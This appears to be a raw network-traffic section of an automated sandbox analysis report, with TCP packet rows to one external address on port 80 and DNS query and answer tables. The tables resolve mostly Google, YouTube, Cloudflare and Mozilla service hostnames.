                                                                                        Jul 24, 2024 07:15:07.027954102 CEST4982180192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.028402090 CEST4982180192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.033452034 CEST804982177.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.049063921 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.054100037 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.054198027 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.054306984 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.059060097 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.720402002 CEST804982177.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.720613003 CEST4982180192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.721416950 CEST4982180192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.726186991 CEST804982177.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.767776966 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.767827034 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.767838955 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.767868042 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.767868042 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.767949104 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.768013954 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768026114 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768035889 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768073082 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.768127918 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.768254042 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768265963 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768275023 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768466949 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.768768072 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.772722960 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.772787094 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.772790909 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.772861958 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.772866964 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.772942066 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.772943974 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.773008108 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.887337923 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.887353897 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.887365103 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.887418032 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.887485027 CEST804982277.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.887489080 CEST4982280192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.887543917 CEST4982280192.168.2.677.91.77.81

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Jul 24, 2024 07:14:28.178843975 CEST192.168.2.61.1.1.10xc784Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.178986073 CEST192.168.2.61.1.1.10x3bebStandard query (0)www.youtube.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.696764946 CEST192.168.2.61.1.1.10x16bStandard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.696954012 CEST192.168.2.61.1.1.10x1dd3Standard query (0)www.youtube.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:33.256508112 CEST192.168.2.61.1.1.10xb5d3Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:33.256668091 CEST192.168.2.61.1.1.10xbbffStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.610840082 CEST192.168.2.61.1.1.10xf2fbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.611176014 CEST192.168.2.61.1.1.10xa408Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.611952066 CEST192.168.2.61.1.1.10x1addStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.612411976 CEST192.168.2.61.1.1.10x38e3Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.653350115 CEST192.168.2.61.1.1.10x2f1aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.653788090 CEST192.168.2.61.1.1.10x9a89Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:39.804922104 CEST192.168.2.61.1.1.10xba4dStandard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:39.815526962 CEST192.168.2.61.1.1.10x83ffStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.297941923 CEST192.168.2.61.1.1.10x4f23Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.313080072 CEST192.168.2.61.1.1.10x1b26Standard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.321755886 CEST192.168.2.61.1.1.10x5debStandard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.802436113 CEST192.168.2.61.1.1.10x8ef5Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.813057899 CEST192.168.2.61.1.1.10x7081Standard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.822103977 CEST192.168.2.61.1.1.10x14a9Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:45.266222954 CEST192.168.2.61.1.1.10x2820Standard query (0)accounts.youtube.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:45.266400099 CEST192.168.2.61.1.1.10x7420Standard query (0)accounts.youtube.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:48.300707102 CEST192.168.2.61.1.1.10xe96Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:48.300868034 CEST192.168.2.61.1.1.10x1fcaStandard query (0)play.google.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:50.545753956 CEST192.168.2.61.1.1.10x3512Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:50.545895100 CEST192.168.2.61.1.1.10x8996Standard query (0)www.google.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:01.830339909 CEST192.168.2.61.1.1.10xb0a2Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:08.606920004 CEST192.168.2.61.1.1.10xb07fStandard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:08.661834002 CEST192.168.2.61.1.1.10x7e02Standard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.095443964 CEST192.168.2.61.1.1.10xf02dStandard query (0)prod.remote-settings.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.105453968 CEST192.168.2.61.1.1.10x8541Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.105488062 CEST192.168.2.61.1.1.10x609aStandard query (0)services.addons.mozilla.orgA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.111462116 CEST192.168.2.61.1.1.10x9a2cStandard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.112783909 CEST192.168.2.61.1.1.10x26daStandard query (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.119071960 CEST192.168.2.61.1.1.10xf485Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:09.591918945 CEST192.168.2.61.1.1.10xeb6eStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.068253994 CEST192.168.2.61.1.1.10x9f2cStandard query (0)telemetry-incoming.r53-2.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.082927942 CEST192.168.2.61.1.1.10xeafbStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:36.772591114 CEST192.168.2.61.1.1.10x940eStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:22.920996904 CEST192.168.2.61.1.1.10xe560Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:22.921133995 CEST192.168.2.61.1.1.10x25a1Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:41.137567997 CEST192.168.2.61.1.1.10x5798Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:17:41.655996084 CEST192.168.2.61.1.1.10xa584Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:15.633387089 CEST192.168.2.61.1.1.10xccaaStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:43.439182043 CEST192.168.2.61.1.1.10x3bb3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:18:43.439182997 CEST192.168.2.61.1.1.10x8f57Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.435126066 CEST192.168.2.61.1.1.10xdc53Standard query (0)content-signature-2.cdn.mozilla.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.447113037 CEST192.168.2.61.1.1.10x7eb3Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:37.454950094 CEST192.168.2.61.1.1.10x9f68Standard query (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:19:38.453304052 CEST192.168.2.61.1.1.10xceb5Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:20:29.984431982 CEST192.168.2.61.1.1.10x2104Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:21:42.865011930 CEST192.168.2.61.1.1.10xa93cStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:21:43.342859983 CEST192.168.2.61.1.1.10x24Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.852267027 CEST192.168.2.61.1.1.10x4c80Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.861880064 CEST192.168.2.61.1.1.10x5fa9Standard query (0)youtube-ui.l.google.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.870337009 CEST192.168.2.61.1.1.10x380eStandard query (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.931179047 CEST192.168.2.61.1.1.10x5703Standard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.945288897 CEST192.168.2.61.1.1.10x7eb8Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:15.996535063 CEST192.168.2.61.1.1.10x7b6eStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.010776043 CEST192.168.2.61.1.1.10x56d3Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.022443056 CEST192.168.2.61.1.1.10xc748Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.057696104 CEST192.168.2.61.1.1.10x8c5fStandard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.069643021 CEST192.168.2.61.1.1.10xf983Standard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.077788115 CEST192.168.2.61.1.1.10xa00bStandard query (0)shavar.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.116094112 CEST192.168.2.61.1.1.10xa00bStandard query (0)shavar.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.116094112 CEST192.168.2.61.1.1.10xf983Standard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.141767025 CEST192.168.2.61.1.1.10x895bStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.187530994 CEST192.168.2.61.1.1.10x895bStandard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.323137045 CEST192.168.2.61.1.1.10x7b86Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.361707926 CEST192.168.2.61.1.1.10x1Standard query (0)shavar.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.401371002 CEST192.168.2.61.1.1.10xc1b7Standard query (0)firefox.settings.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.434076071 CEST192.168.2.61.1.1.10xe610Standard query (0)prod.remote-settings.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.442925930 CEST192.168.2.61.1.1.10x95c9Standard query (0)prod.remote-settings.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:16.455719948 CEST192.168.2.61.1.1.10x75acStandard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:26.870666981 CEST192.168.2.61.1.1.10x8175Standard query (0)telemetry-incoming.r53-2.services.mozilla.com28IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:32.912986994 CEST192.168.2.61.1.1.10xb647Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:45.838511944 CEST192.168.2.61.1.1.10xe0c3Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:45.885335922 CEST192.168.2.61.1.1.10xe0c3Standard query (0)push.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:22:54.669784069 CEST192.168.2.61.1.1.10x7494Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.847197056 CEST192.168.2.61.1.1.10x7063Standard query (0)support.mozilla.orgA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.856038094 CEST192.168.2.61.1.1.10xbbe6Standard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:23:04.865879059 CEST192.168.2.61.1.1.10x4ff0Standard query (0)us-west1.prod.sumo.prod.webservices.mozgcp.net28IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185801983 CEST1.1.1.1192.168.2.60xc784No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185904980 CEST1.1.1.1192.168.2.60x3bebNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:28.185904980 CEST1.1.1.1192.168.2.60x3bebNo error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703881979 CEST1.1.1.1192.168.2.60x1dd3No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703881979 CEST1.1.1.1192.168.2.60x1dd3No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:31.703902960 CEST1.1.1.1192.168.2.60x16bNo error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:32.005031109 CEST1.1.1.1192.168.2.60x6d20No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:32.008351088 CEST1.1.1.1192.168.2.60x6bbbNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:32.008351088 CEST1.1.1.1192.168.2.60x6bbbNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:33.265072107 CEST1.1.1.1192.168.2.60xb5d3No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:33.265388012 CEST1.1.1.1192.168.2.60xbbffNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.617605925 CEST1.1.1.1192.168.2.60xf2fbNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.617605925 CEST1.1.1.1192.168.2.60xf2fbNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.617734909 CEST1.1.1.1192.168.2.60xa408No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.618765116 CEST1.1.1.1192.168.2.60x1addNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.618765116 CEST1.1.1.1192.168.2.60x1addNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.619312048 CEST1.1.1.1192.168.2.60x38e3No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.660156012 CEST1.1.1.1192.168.2.60x2f1aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.660156012 CEST1.1.1.1192.168.2.60x2f1aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:36.661235094 CEST1.1.1.1192.168.2.60x9a89No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:39.765667915 CEST1.1.1.1192.168.2.60xcdadNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:39.812088013 CEST1.1.1.1192.168.2.60xba4dNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.304657936 CEST1.1.1.1192.168.2.60x4f23No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.304657936 CEST1.1.1.1192.168.2.60x4f23No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.319870949 CEST1.1.1.1192.168.2.60x1b26No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.328428030 CEST1.1.1.1192.168.2.60x5debNo error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.809859991 CEST1.1.1.1192.168.2.60x8ef5No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.819976091 CEST1.1.1.1192.168.2.60x7081No error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.819976091 CEST1.1.1.1192.168.2.60x7081No error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.829042912 CEST1.1.1.1192.168.2.60x14a9No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:40.829042912 CEST1.1.1.1192.168.2.60x14a9No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:45.273554087 CEST1.1.1.1192.168.2.60x2820No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:45.273554087 CEST1.1.1.1192.168.2.60x2820No error (0)www3.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:45.273752928 CEST1.1.1.1192.168.2.60x7420No error (0)accounts.youtube.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:48.309541941 CEST1.1.1.1192.168.2.60xe96No error (0)play.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:50.552638054 CEST1.1.1.1192.168.2.60x3512No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                        Jul 24, 2024 07:14:50.552856922 CEST1.1.1.1192.168.2.60x8996No error (0)www.google.com65IN (0x0001)false
                                                                                        Jul 24, 2024 07:15:01.898766041 CEST1.1.1.1192.168.2.60xb0a2No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
